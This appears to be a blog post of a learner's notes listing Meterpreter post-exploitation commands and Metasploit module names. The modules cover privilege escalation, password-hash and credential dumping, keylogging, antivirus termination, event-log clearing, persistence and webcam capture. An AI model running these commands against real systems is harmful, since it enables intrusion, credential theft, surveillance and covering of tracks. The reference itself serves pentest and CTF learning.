Capture The Frog

Frogs go hop, hop lol


List of usable meterpreter commands

This is a running summary of the commands available in meterpreter.

I plan to update it as I go.

 

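・sysinfo

Retrieves system information.

・ipconfig

Usage is the same as the DOS command.

・ps

Lists running processes.

・getuid

Checks the current user.

・getsystem

Attempts privilege escalation.

With no options, it tries multiple techniques.

・getuid

Checks the current user.

・getprivs

Shows the privileges that are enabled.

・hashdump

Retrieves password hashes.

Analyze the retrieved hashes with john.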

 

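・upload <filename>

Uploads a file to the target.

・download <filename>

Downloads a file from the target to the local host.

・timestomp <filename> -z "01/01/2005 00:00:00"

Changes a file's timestamps.

・screenshot

Takes a screenshot.

The JPEG file is displayed in the browser on the machine running Metasploit.

・clearev

Deletes the event logs.

・execute <filename>

Runs an executable file.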

 

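・run

Type run and press the Tab key three times to list the meterpreter scripts that can be run.

・run checkvm

Checks whether the target is a virtual environment.

・run killav

Terminates antivirus software.

・run getgui -e

Enables Remote Desktop.

・run keylogrecorder

Runs a keylogger.

・run packetrecorder

Runs a packet capture.

List of run scripts

The script names are mostly self-explanatory, so I'll leave it at that.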


run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager

run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run winbf
run winenum
run wmic

 



run exploit/windows/local/adobe_sandbox_adobecollabsync

run exploit/windows/local/agnitum_outpost_acs
run exploit/windows/local/alpc_taskscheduler
run exploit/windows/local/always_install_elevated
run exploit/windows/local/anyconnect_lpe
run exploit/windows/local/applocker_bypass
run exploit/windows/local/appxsvc_hard_link_privesc
run exploit/windows/local/ask
run exploit/windows/local/bits_ntlm_token_impersonation
run exploit/windows/local/bthpan
run exploit/windows/local/bypassuac
run exploit/windows/local/bypassuac_comhijack
run exploit/windows/local/bypassuac_dotnet_profiler
run exploit/windows/local/bypassuac_eventvwr
run exploit/windows/local/bypassuac_fodhelper
run exploit/windows/local/bypassuac_injection
run exploit/windows/local/bypassuac_injection_winsxs
run exploit/windows/local/bypassuac_sdclt
run exploit/windows/local/bypassuac_silentcleanup

run exploit/windows/local/bypassuac_sluihijack
run exploit/windows/local/bypassuac_vbs
run exploit/windows/local/bypassuac_windows_store_filesys
run exploit/windows/local/bypassuac_windows_store_reg
run exploit/windows/local/capcom_sys_exec
run exploit/windows/local/comahawk
run exploit/windows/local/current_user_psexec
run exploit/windows/local/cve_2017_8464_lnk_lpe
run exploit/windows/local/cve_2018_8453_win32k_priv_esc
run exploit/windows/local/cve_2019_1458_wizardopium
run exploit/windows/local/cve_2020_0668_service_tracing
run exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
run exploit/windows/local/cve_2020_0796_smbghost
run exploit/windows/local/cve_2020_1048_printerdemon
run exploit/windows/local/cve_2020_1054_drawiconex_lpe
run exploit/windows/local/cve_2020_1313_system_orchestrator
run exploit/windows/local/cve_2020_1337_printerdemon
run exploit/windows/local/cve_2020_17136
run exploit/windows/local/cve_2021_1732_win32k
run exploit/windows/local/cve_2021_21551_dbutil_memmove
run exploit/windows/local/dnsadmin_serverlevelplugindll
run exploit/windows/local/docker_credential_wincred
run exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
run exploit/windows/local/gog_galaxyclientservice_privesc
run exploit/windows/local/ikeext_service
run exploit/windows/local/ipass_launch_app
run exploit/windows/local/lenovo_systemupdate
run exploit/windows/local/microfocus_operations_privesc
run exploit/windows/local/mov_ss
run exploit/windows/local/mqac_write
run exploit/windows/local/ms10_015_kitrap0d
run exploit/windows/local/ms10_092_schelevator
run exploit/windows/local/ms11_080_afdjoinleaf
run exploit/windows/local/ms13_005_hwnd_broadcast
run exploit/windows/local/ms13_053_schlamperei

run exploit/windows/local/ms13_081_track_popup_menu
run exploit/windows/local/ms13_097_ie_registry_symlink
run exploit/windows/local/ms14_009_ie_dfsvc
run exploit/windows/local/ms14_058_track_popup_menu
run exploit/windows/local/ms14_070_tcpip_ioctl
run exploit/windows/local/ms15_004_tswbproxy
run exploit/windows/local/ms15_051_client_copy_image
run exploit/windows/local/ms15_078_atmfd_bof
run exploit/windows/local/ms16_014_wmi_recv_notif
run exploit/windows/local/ms16_016_webdav
run exploit/windows/local/ms16_032_secondary_logon_handle_privesc
run exploit/windows/local/ms16_075_reflection
run exploit/windows/local/ms16_075_reflection_juicy
run exploit/windows/local/ms18_8120_win32k_privesc
run exploit/windows/local/ms_ndproxy
run exploit/windows/local/novell_client_nicm
run exploit/windows/local/novell_client_nwfs
run exploit/windows/local/nscp_pe
run exploit/windows/local/ntapphelpcachecontrol
run exploit/windows/local/ntusermndragover
run exploit/windows/local/nvidia_nvsvc
run exploit/windows/local/panda_psevents
run exploit/windows/local/payload_inject
run exploit/windows/local/persistence
run exploit/windows/local/persistence_image_exec_options
run exploit/windows/local/persistence_service
run exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
run exploit/windows/local/powershell_cmd_upgrade
run exploit/windows/local/powershell_remoting
run exploit/windows/local/ppr_flatten_rec
run exploit/windows/local/ps_persist
run exploit/windows/local/ps_wmi_exec
run exploit/windows/local/pxeexploit
run exploit/windows/local/razer_zwopenprocess
run exploit/windows/local/registry_persistence
run exploit/windows/local/ricoh_driver_privesc
run exploit/windows/local/run_as
run exploit/windows/local/s4u_persistence
run exploit/windows/local/service_permissions
run exploit/windows/local/srclient_dll_hijacking
run exploit/windows/local/tokenmagic
run exploit/windows/local/unquoted_service_path
run exploit/windows/local/virtual_box_guest_additions
run exploit/windows/local/virtual_box_opengl_escape
run exploit/windows/local/vss_persistence
run exploit/windows/local/webexec
run exploit/windows/local/windscribe_windscribeservice_priv_esc
run exploit/windows/local/wmi
run exploit/windows/local/wmi_persistence
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets

run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/aix/hashdump
run post/android/capture/screen
run post/android/gather/hashdump
run post/android/gather/sub_info
run post/android/gather/wireless_ap
run post/android/local/koffee
run post/android/manage/remove_lock
run post/android/manage/remove_lock_root
run post/apple_ios/gather/ios_image_gather
run post/apple_ios/gather/ios_text_gather
run post/bsd/gather/hashdump
run post/firefox/gather/cookies
run post/firefox/gather/history
run post/firefox/gather/passwords
run post/firefox/gather/xss
run post/firefox/manage/webcam_chat
run post/hardware/automotive/can_flood
run post/hardware/automotive/canprobe
run post/hardware/automotive/getvinfo
run post/hardware/automotive/identifymodules
run post/hardware/automotive/malibu_overheat
run post/hardware/automotive/mazda_ic_mover
run post/hardware/automotive/pdt
run post/hardware/rftransceiver/rfpwnon
run post/hardware/rftransceiver/transmitter
run post/hardware/zigbee/zstumbler
run post/linux/busybox/enum_connections
run post/linux/busybox/enum_hosts
run post/linux/busybox/jailbreak
run post/linux/busybox/ping_net
run post/linux/busybox/set_dmz
run post/linux/busybox/set_dns
run post/linux/busybox/smb_share_root

run post/linux/busybox/wget_exec
run post/linux/dos/xen_420_dos
run post/linux/gather/checkcontainer
run post/linux/gather/checkvm
run post/linux/gather/ecryptfs_creds
run post/linux/gather/enum_commands
run post/linux/gather/enum_configs
run post/linux/gather/enum_containers
run post/linux/gather/enum_nagios_xi
run post/linux/gather/enum_network
run post/linux/gather/enum_protections
run post/linux/gather/enum_psk
run post/linux/gather/enum_system
run post/linux/gather/enum_users_history
run post/linux/gather/gnome_commander_creds
run post/linux/gather/gnome_keyring_dump
run post/linux/gather/haserl_read
run post/linux/gather/hashdump
run post/linux/gather/mount_cifs_creds
run post/linux/gather/openvpn_credentials
run post/linux/gather/phpmyadmin_credsteal
run post/linux/gather/pptpd_chap_secrets
run post/linux/gather/tor_hiddenservices
run post/linux/manage/dns_spoofing
run post/linux/manage/download_exec
run post/linux/manage/iptables_removal
run post/linux/manage/pseudo_shell
run post/linux/manage/sshkey_persistence
run post/multi/escalate/aws_create_iam_user
run post/multi/escalate/cups_root_file_read
run post/multi/escalate/metasploit_pcaplog
run post/multi/gather/apple_ios_backup
run post/multi/gather/aws_ec2_instance_metadata
run post/multi/gather/aws_keys
run post/multi/gather/check_malware
run post/multi/gather/chrome_cookies
run post/multi/gather/dbvis_enum
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/docker_creds
run post/multi/gather/enum_hexchat
run post/multi/gather/enum_software_versions
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/fetchmailrc_creds
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/gpg_creds
run post/multi/gather/grub_creds
run post/multi/gather/irssi_creds
run post/multi/gather/jboss_gather
run post/multi/gather/jenkins_gather

run post/multi/gather/lastpass_creds
run post/multi/gather/maven_creds
run post/multi/gather/multi_command
run post/multi/gather/netrc_creds
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/remmina_creds
run post/multi/gather/resolve_hosts
run post/multi/gather/rsyncd_creds
run post/multi/gather/rubygems_api_key
run post/multi/gather/run_console_rc_file
run post/multi/gather/saltstack_salt
run post/multi/gather/skype_enum
run post/multi/gather/ssh_creds
run post/multi/gather/thunderbird_creds
run post/multi/gather/tomcat_gather
run post/multi/gather/ubiquiti_unifi_backup
run post/multi/gather/unix_cached_ad_hashes
run post/multi/gather/unix_kerberos_tickets
run post/multi/gather/wlan_geolocate
run post/multi/general/close
run post/multi/general/execute
run post/multi/general/wall
run post/multi/manage/autoroute
run post/multi/manage/dbvis_add_db_admin
run post/multi/manage/dbvis_query
run post/multi/manage/hsts_eraser
run post/multi/manage/multi_post
run post/multi/manage/open
run post/multi/manage/play_youtube
run post/multi/manage/record_mic
run post/multi/manage/screensaver
run post/multi/manage/screenshare
run post/multi/manage/set_wallpaper
run post/multi/manage/shell_to_meterpreter
run post/multi/manage/sudo
run post/multi/manage/system_session
run post/multi/manage/upload_exec
run post/multi/manage/zip
run post/multi/recon/local_exploit_suggester
run post/multi/recon/multiport_egress_traffic
run post/multi/recon/sudo_commands
run post/multi/sap/smdagent_get_properties

run exploit/multi/local/allwinner_backdoor
run exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
run exploit/multi/local/xorg_x11_suid_server
run exploit/multi/local/xorg_x11_suid_server_modulepath

 


run post/networking/gather/enum_brocade
run post/networking/gather/enum_cisco
run post/networking/gather/enum_f5
run post/networking/gather/enum_juniper
run post/networking/gather/enum_mikrotik
run post/networking/gather/enum_vyos

 

 

run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/golden_ticket
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/screen_unlock
run post/windows/escalate/unmarshal_cmd_exec
run post/windows/gather/ad_to_sqlite
run post/windows/gather/arp_scanner
run post/windows/gather/avast_memory_dump
run post/windows/gather/bitcoin_jacker
run post/windows/gather/bitlocker_fvek
run post/windows/gather/bloodhound
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/avira_password
run post/windows/gather/credentials/bulletproof_ftp
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/domain_hashdump
run post/windows/gather/credentials/dynazip_log
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_laps
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/heidisql
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/mcafee_vse_hashdump
run post/windows/gather/credentials/mdaemon_cred_collector
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/mssql_local_hashdump
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/pulse_secure
run post/windows/gather/credentials/purevpn_cred_collector
run post/windows/gather/credentials/razer_synapse
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/rdc_manager_creds
run post/windows/gather/credentials/securecrt
run post/windows/gather/credentials/skype
run post/windows/gather/credentials/smartermail
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/spark_im
run post/windows/gather/credentials/sso

run post/windows/gather/credentials/steam
run post/windows/gather/credentials/teamviewer_passwords
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/credentials/xshell_xftp_password
run post/windows/gather/dnscache_dump
run post/windows/gather/dumplinks
run post/windows/gather/enum_ad_bitlocker
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_managedby_groups
run post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/enum_ad_to_wordlist
run post/windows/gather/enum_ad_user_comments
run post/windows/gather/enum_ad_users
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_av_excluded
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
run post/windows/gather/enum_emet
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_hyperv_vms
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_muicache
run post/windows/gather/enum_onedrive
run post/windows/gather/enum_patches
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_prefetch
run post/windows/gather/enum_proxy
run post/windows/gather/enum_putty_saved_sessions
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_trusted_locations

run post/windows/gather/enum_unattend
run post/windows/gather/exchange
run post/windows/gather/file_from_raw_ntfs
run post/windows/gather/forensics/browser_history
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/fanny_bmp_check
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/recovery_files
run post/windows/gather/hashdump
run post/windows/gather/local_admin_search_enum
run post/windows/gather/lsa_secrets
run post/windows/gather/make_csv_orgchart
run post/windows/gather/memory_dump
run post/windows/gather/memory_grep
run post/windows/gather/netlm_downgrade
run post/windows/gather/ntds_grabber
run post/windows/gather/ntds_location
run post/windows/gather/outlook
run post/windows/gather/phish_windows_credentials
run post/windows/gather/psreadline_history
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/gather/word_unc_injector
run post/windows/manage/add_user
run post/windows/manage/archmigrate
run post/windows/manage/change_password
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/driver_loader
run post/windows/manage/enable_rdp
run post/windows/manage/enable_support_account
run post/windows/manage/exec_powershell
run post/windows/manage/execute_dotnet_assembly
run post/windows/manage/forward_pageant
run post/windows/manage/hashcarve
run post/windows/manage/ie_proxypac
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/install_python
run post/windows/manage/install_ssh
run post/windows/manage/killav
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server

run post/windows/manage/peinjector
run post/windows/manage/persistence_exe
run post/windows/manage/portproxy
run post/windows/manage/powershell/build_net_code
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/powershell/load_script
run post/windows/manage/pptp_tunnel
run post/windows/manage/priv_migrate
run post/windows/manage/pxeexploit
run post/windows/manage/reflective_dll_inject
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rid_hijack
run post/windows/manage/rollback_defender_signatures
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/run_as_psh
run post/windows/manage/sdel
run post/windows/manage/shellcode_inject
run post/windows/manage/sshkey_persistence
run post/windows/manage/sticky_keys
run post/windows/manage/vmdk_mount
run post/windows/manage/vss
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/manage/wdigest_caching
run post/windows/manage/webcam
run post/windows/recon/computer_browser_discovery
run post/windows/recon/outbound_ports
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_probe_request
run post/windows/wlan/wlan_profile

 

 

 

 

 

 

 

For more detail, there is a cheat sheet here:

https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf